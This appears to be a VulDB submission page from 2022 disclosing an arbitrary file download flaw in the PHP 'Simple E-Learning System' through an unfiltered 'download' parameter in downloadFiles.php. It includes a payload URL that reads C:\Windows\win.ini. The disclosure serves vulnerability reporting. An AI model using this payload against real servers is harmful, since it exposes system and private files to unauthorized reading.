| Título | Simple E-Learning System Unauthorized download of arbitrary files |
|---|
| Descripción | info:Simple E-Learning System does not authorize arbitrary file downloads
The downloadFiles file can directly pass parameters for file download,
The parameter download does not filter parameters, URL: http://192.168.153.1/vcs//downloadFiles.php?download=xxxxx can download any file directly.
payload:
http://192.168.153.1/vcs//downloadFiles.php?download=C:\Windows\win.ini |
|---|
| Fuente | ⚠️ https:// www.sourcecodester.com/php-simple-e-learning-system-source-code |
|---|
| Usuario | jsbae3449 (UID 30775) |
|---|
| Sumisión | 2022-08-10 15:00 (hace 4 años) |
|---|
| Moderación | 2022-08-11 11:22 (20 hours later) |
|---|
| Estado | Duplicado |
|---|
| Entrada de VulDB | 205828 [SourceCodester Simple E-Learning System downloadFiles.php Descargar divulgación de información] |
|---|
| Puntos | 0 |
|---|